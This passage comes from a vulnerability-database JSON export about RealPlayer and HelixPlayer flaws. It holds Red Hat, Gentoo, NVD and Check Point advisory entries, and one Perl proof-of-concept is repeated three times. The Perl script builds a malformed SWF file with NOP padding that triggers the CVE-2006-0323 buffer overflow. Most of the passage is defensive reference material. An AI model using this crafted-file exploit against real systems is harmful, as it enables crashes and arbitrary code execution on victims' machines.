"2005-11-16T00:00:00", "type": "securityvulns", "title": "iDEFENSE Security Advisory 11.15.05: Multiple Vendor Insecure Call to CreateProcess() Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2005-2940", "CVE-2005-2939", "CVE-2005-2937", "CVE-2005-2938", "CVE-2005-2936"], "modified": "2005-11-16T00:00:00", "id": "SECURITYVULNS:DOC:10252", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10252", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-21T04:43:00", "description": "RealPlayer is a media player that provides media playback locally and via\r\nstreaming.\r\n\r\nA buffer overflow bug was discovered in the way RealPlayer processes Flash\r\nMedia (.swf) files. It is possible for a malformed Flash Media file to\r\nexecute arbitrary code as the user running RealPlayer. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2006-0323 to\r\nthis issue.\r\n\r\nAll users of RealPlayer are advised to upgrade to this updated package,\r\nwhich contains RealPlayer version 10.0.7 and is not vulnerable to this issue.", "cvss3": {}, "published": "2006-03-22T00:00:00", "type": "redhat", "title": "(RHSA-2006:0257) RealPlayer security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2018-05-26T00:26:19", "id": "RHSA-2006:0257", "href": "https://access.redhat.com/errata/RHSA-2006:0257", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:43:00", "description": "RealPlayer is a media player that provides media playback locally and\r\nvia streaming.\r\n\r\nA format string bug was discovered in the way RealPlayer processes RealPix\r\n(.rp) files. It is possible for a malformed RealPix file to execute\r\narbitrary code as the user running RealPlayer. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2005-2710\r\nto this issue.\r\n\r\nAll users of RealPlayer are advised to upgrade to this updated package,\r\nwhich contains RealPlayer version 10.0.6 and is not vulnerable to this issue.", "cvss3": {}, "published": "2005-09-27T00:00:00", "type": "redhat", "title": "(RHSA-2005:762) RealPlayer security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2629", "CVE-2005-2710", "CVE-2005-2922"], "modified": "2018-05-26T00:26:19", "id": "RHSA-2005:762", "href": "https://access.redhat.com/errata/RHSA-2005:762", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:43:59", "description": "HelixPlayer is a media player.\r\n\r\nA format string bug was discovered in the way HelixPlayer processes RealPix\r\n(.rp) files. It is possible for a malformed RealPix file to execute\r\narbitrary code as the user running HelixPlayer. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2005-2710\r\nto this issue.\r\n\r\nAll users of HelixPlayer are advised to upgrade to this updated package,\r\nwhich contains HelixPlayer version 10.0.6 and is not vulnerable to this issue.", "cvss3": {}, "published": "2005-09-27T00:00:00", "type": "redhat", "title": "(RHSA-2005:788) HelixPlayer security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2629", "CVE-2005-2710", "CVE-2005-2922"], "modified": "2017-09-08T08:16:41", "id": "RHSA-2005:788", "href": "https://access.redhat.com/errata/RHSA-2005:788", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "exploitpack", "title": "RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "EXPLOITPACK:2B9A593CB682A18F23FA908F3143E367", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/17202/info\n\nVarious RealNetworks products are prone to multiple buffer-overflow vulnerabilities.\n\nThese issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote attackers to execute arbitrary code in the context of the application to gain unauthorized access.\n\n#!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE=\"egg.swf\";\nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\n\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\n\t \"\\x00\\x00\\x00\";\n\n\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= \"\\x90\";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:45", "description": "\nRealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)", "cvss3": {}, "published": "2006-03-28T00:00:00", "type": "exploitpack", "title": "RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-28T00:00:00", "id": "EXPLOITPACK:13F7868B04FD8DDB92761B19FD8AB565", "href": "", "sourceData": "#!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE=\"egg.swf\";\nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\n\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\n\t \"\\x00\\x00\\x00\";\n\n\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= \"\\x90\";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);\n\n# milw0rm.com [2006-03-28]", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-09-15T16:51:17", "description": "Buffer overflow in swfformat.dll in multiple RealNetworks products and versions including RealPlayer 10.x, RealOne Player, Rhapsody 3, and Helix Player allows remote attackers to execute arbitrary code via a crafted SWF (Flash) file with (1) a size value that is less than the actual size, or (2) other unspecified manipulations.", "cvss3": {}, "published": "2006-03-23T23:06:00", "type": "cve", "title": "CVE-2006-0323", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2018-10-19T15:44:00", "cpe": ["cpe:/a:realnetworks:realplayer:10.5", "cpe:/a:realnetworks:rhapsody:3", "cpe:/a:realnetworks:helix_player:*", "cpe:/a:realnetworks:realplayer:10.0", "cpe:/a:realnetworks:realplayer:10.0.6", "cpe:/a:realnetworks:realone_player:*"], "id": "CVE-2006-0323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0323", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:realnetworks:helix_player:*:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0:gold:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:rhapsody:3:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:*:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-16T20:06:02", "description": "Buffer overflow in RealNetworks RealPlayer 10.5 6.0.12.1040 through 6.0.12.1348, RealPlayer 10, RealOne Player v2, RealOne Player v1, RealPlayer 8, and RealPlayer Enterprise before 20060322 allows remote attackers to have an unknown impact via a malicious Mimio boardCast (mbc) file.", "cvss3": {}, "published": "2006-03-23T23:06:00", "type": "cve", "title": "CVE-2006-1370", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1370"], "modified": "2017-07-20T01:30:00", "cpe": ["cpe:/a:realnetworks:realplayer:10.5_6.0.12.1348", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1069", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1235", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1040", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1056", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1053", "cpe:/a:realnetworks:realone_player:2.0", "cpe:/a:realnetworks:realplayer:10.0", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1059", "cpe:/a:realnetworks:realplayer:8.0", "cpe:/a:realnetworks:realplayer:*", "cpe:/a:realnetworks:realone_player:1.0"], "id": "CVE-2006-1370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1370", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:realnetworks:realplayer:*:*:enterprise:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1348:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1053:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1059:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1069:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1040:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1235:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1056:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T08:22:56", "description": "Unquoted Windows search path vulnerability in RealNetworks RealPlayer 10.5 6.0.12.1040 through 6.0.12.1348, RealPlayer 10, RealOne Player v2, RealOne Player v1, and RealPlayer 8 before 20060322 might allow local users to gain privileges via a malicious C:\\program.exe file.", "cvss3": {}, "published": "2005-11-18T06:03:00", "type": "cve", "title": "CVE-2005-2936", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2936"], "modified": "2011-05-19T04:00:00", "cpe": ["cpe:/a:realnetworks:realone_player:2.0", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1040", "cpe:/a:realnetworks:realone_player:1.0", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1348", "cpe:/a:realnetworks:realplayer:10.0", "cpe:/a:realnetworks:realplayer:8.0"], "id": "CVE-2005-2936", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2936", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:realnetworks:realone_player:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1348:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1040:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T08:15:34", "description": "Heap-based buffer overflow in the embedded player in multiple RealNetworks products and versions including RealPlayer 10.x, RealOne Player, and Helix Player allows remote malicious servers to cause a denial of service (crash) and possibly execute arbitrary code via a chunked Transfer-Encoding HTTP response in which either (1) the chunk header length is specified as -1, (2) the chunk header with a length that is less than the actual amount of sent data, or (3) a missing chunk header.", "cvss3": {}, "published": "2005-12-31T05:00:00", "type": "cve", "title": "CVE-2005-2922", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2922"], "modified": "2017-10-11T01:30:00", "cpe": ["cpe:/a:realnetworks:realone_player:2.0", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1069", "cpe:/a:realnetworks:helix_player:10.0.1", "cpe:/a:realnetworks:realplayer:10.0.5", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1053", "cpe:/a:realnetworks:rhapsody:3.0", "cpe:/a:realnetworks:realplayer:8.0", "cpe:/a:realnetworks:rhapsody:3.0_build_0.815", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1040", "cpe:/a:realnetworks:helix_player:10.0.4", "cpe:/a:realnetworks:realplayer:10.0.0.305", "cpe:/a:realnetworks:realone_player:0.288", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1235", "cpe:/a:realnetworks:realone_player:*", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1056", "cpe:/a:realnetworks:helix_player:10.0.6", "cpe:/a:realnetworks:helix_player:10.0.5", "cpe:/a:realnetworks:helix_player:10.0.2", "cpe:/a:realnetworks:realplayer:10.0.6", "cpe:/a:realnetworks:realplayer:10.0", "cpe:/a:realnetworks:realplayer:10.5_6.0.12.1059", "cpe:/a:realnetworks:realplayer:10.0.3", "cpe:/a:realnetworks:realplayer:10.0.0.331", "cpe:/a:realnetworks:realplayer:10.5", "cpe:/a:realnetworks:realone_player:0.297", "cpe:/a:realnetworks:realplayer:10.0.4", "cpe:/a:realnetworks:realone_player:1.0", "cpe:/a:realnetworks:realplayer:10.0.1", "cpe:/a:realnetworks:helix_player:10.0", "cpe:/a:realnetworks:helix_player:10.0.3", "cpe:/a:realnetworks:realplayer:10.0.2", "cpe:/a:realnetworks:realplayer:*"], "id": "CVE-2005-2922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2922", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1059:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1053:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.6:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:rhapsody:3.0_build_0.815:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:rhapsody:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0.3:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1235:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0.5:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1069:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.3:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:*:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.0.305:*:mac_os:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.0.331:*:mac_os:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0.4:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0.6:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:0.288:*:mac_os_x:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:8.0:*:win32:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:*:*:enterprise:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1056:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0.2:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.1:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:helix_player:10.0.1:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.4:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.5_6.0.12.1040:*:*:*:*:*:*:*", "cpe:2.3:a:realnetworks:realone_player:0.297:*:mac_os_x:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.5:*:linux:*:*:*:*:*", "cpe:2.3:a:realnetworks:realplayer:10.0.2:*:linux:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2023-09-15T22:00:34", "description": "### Background\n\nRealPlayer is a multimedia player capable of handling multiple multimedia file formats. \n\n### Description\n\nRealPlayer is vulnerable to a buffer overflow when processing malicious SWF files. \n\n### Impact\n\nBy enticing a user to open a specially crafted SWF file an attacker could execute arbitrary code with the permissions of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll RealPlayer users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/realplayer-10.0.7\"", "cvss3": {}, "published": "2006-03-26T00:00:00", "type": "gentoo", "title": "RealPlayer: Buffer overflow vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-26T00:00:00", "id": "GLSA-200603-24", "href": "https://security.gentoo.org/glsa/200603-24", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:35:07", "description": "RealPlayer and RealOne Player are media player applications developed by RealNetworks, Inc. These applications are capable of playing back numerous multimedia file formats. The application can open media files from local file system or network servers. RealPlayer has an extensible nature that allows it to handle different media file formats by way of external plugin modules. One such module that is included with some players from RealNetworks is the SWF Flash module. It allows the RealPlayer to process certain types of Macromedia Flash (SWF) files. There exists a buffer overflow vulnerability in the RealNetworks RealPlayer product. The vulnerability is specific to parsing malformed Macromedia Flash (SWF) files. An attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged in user. In case of an attack where code injection and execution is successful, the process flow of the vulnerable application will be diverted to attacker supplied code. The result of such an attack is entirely dependent on the purpose of the injected code. In case of an attack where code injection is not successful, the affected application will terminate.", "cvss3": {}, "published": "2010-02-21T00:00:00", "type": "checkpoint_advisories", "title": "RealNetworks RealPlayer SWF Flash File Buffer Overflow (CVE-2006-0323)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2014-03-18T00:00:00", "id": "CPAI-2006-211", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:44:52", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63442", "id": "SSV:63442", "sourceData": "\n #!/usr/bin/perl\r\n###################################################\r\n# RealPlayer: Buffer overflow vulnerability / PoC\r\n#\r\n# CVE-2006-0323\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n# RealNetworks Advisory\r\n# http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n# Federico L. Bossi Bonin \r\n# fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to Thread -1218976064 (LWP 21932)]\r\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\r\n\r\nmy $EGGFILE="egg.swf";\r\nmy $header="\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60";\r\n\r\nmy $endheader="\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01".\r\n\t "\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02".\r\n\t "\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00".\r\n "\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40".\r\n\t "\\x00\\x00\\x00";\r\n\r\n\r\nopen(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\\n";\r\nprint EGG $header;\r\n\r\nfor ($i = 0; $i < 135; $i++) {\r\n$buffer.= "\\x90";\r\n}\r\n\r\nprint EGG $buffer;\r\nprint EGG $endheader;\r\nclose(EGG);\r\n\r\n# milw0rm.com [2006-03-28]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63442", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:52:59", "description": "No description provided by source.", "cvss3": {}, "published": "2007-12-26T00:00:00", "type": "seebug", "title": "RealPlayer 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2007-12-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-7738", "id": "SSV:7738", "sourceData": "\n 